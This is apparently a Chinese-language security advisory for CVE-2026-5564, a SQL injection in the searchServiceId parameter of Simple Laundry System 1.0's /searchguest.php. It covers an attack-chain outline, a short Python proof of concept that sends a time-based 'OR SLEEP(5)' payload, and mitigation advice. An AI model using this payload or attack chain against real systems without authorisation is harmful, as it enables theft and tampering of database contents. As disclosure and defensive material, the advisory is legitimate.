CVE-2026-5564 Simple Laundry System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5564

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Simple Laundry System

漏洞概述

code-projects Simple Laundry System 1.0版本中存在严重的SQL注入漏洞。该漏洞源于/searchguest.php文件中的参数处理组件未能正确过滤用户输入。攻击者可以通过操纵searchServiceId参数，向服务器后端数据库注入恶意SQL语句。由于该漏洞无需身份认证且无需用户交互即可触发，远程攻击者可利用此漏洞窃取数据库敏感信息、篡改数据或破坏系统可用性。目前该漏洞利用代码已公开，风险较高。

技术细节

该漏洞属于典型的SQL注入漏洞，具体发生在Simple Laundry System 1.0的/searchguest.php文件中。程序在处理搜索功能时，直接将用户提交的searchServiceId参数拼接到SQL查询语句中，未进行任何有效的输入验证、过滤或使用预编译语句。这种不安全的编码方式导致攻击者可以通过发送特制的HTTP请求，将恶意SQL代码注入到后端数据库查询中。攻击者可以利用此漏洞执行任意SQL命令，例如读取敏感数据（如用户凭证、业务数据）、修改数据库内容、甚至在特定条件下执行系统命令。由于该漏洞CVSS评分为7.3，且无需用户交互和身份认证，攻击者可利用自动化工具在互联网上大规模扫描并利用此漏洞，对受害系统的数据机密性、完整性和可用性造成严重威胁。

攻击链分析

STEP 1

信息收集

攻击者使用网络扫描工具（如Nmap或Shodan）寻找运行Simple Laundry System 1.0的目标服务器。

STEP 2

漏洞探测

向目标服务器的/searchguest.php接口发送带有特殊SQL语法的测试参数（如单引号），观察服务器响应以判断是否存在注入点。

STEP 3

构造攻击载荷

根据探测结果，构造恶意的SQL注入Payload（例如UNION SELECT语句或基于时间的盲注语句），旨在提取数据库结构或敏感数据。

STEP 4

执行攻击

将包含恶意Payload的HTTP请求发送至服务器。由于未对参数进行过滤，数据库引擎执行了攻击者注入的SQL命令。

STEP 5

数据窃取与利用

攻击者获取数据库中的管理员密码、用户信息等敏感数据，并可能利用这些信息进一步控制服务器或进行勒索。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    """
    Proof of Concept for CVE-2026-5564
    Tests for time-based blind SQL injection in searchServiceId parameter.
    """
    inject_point = "/searchguest.php"
    full_url = f"{target_url}{inject_point}"
    
    # Malicious payload to trigger database delay
    # Payload: ' OR SLEEP(5)-- -
    payload = "1' OR SLEEP(5)-- -"
    
    params = {
        "searchServiceId": payload
    }

    try:
        print(f"[*] Sending request to: {full_url}")
        response = requests.get(full_url, params=params, timeout=10)
        
        # If response time is greater than 5 seconds, injection is likely successful
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! SQL Injection detected.")
        else:
            print("[-] Vulnerability not detected or patched.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1"  # Replace with actual target
    check_sqli(target)

影响范围

Simple Laundry System 1.0

防御指南

临时缓解措施

如果无法立即修补代码，建议在网络边界部署Web应用防火墙（WAF），并配置规则拦截对/searchguest.php接口的异常请求；或者在服务器层面暂时禁用该搜索功能文件，直到修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5564
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5564
3 Details https://www.cvedetails.com/cve/CVE-2026-5564/
4 VulDB https://vuldb.com/cve/CVE-2026-5564
5 Link https://code-projects.org/
6 Link https://github.com/Kazamikazu/Ksec/issues/2
7 Link https://vuldb.com/submit/782976
8 Link https://vuldb.com/vuln/355334
9 Link https://vuldb.com/vuln/355334/cti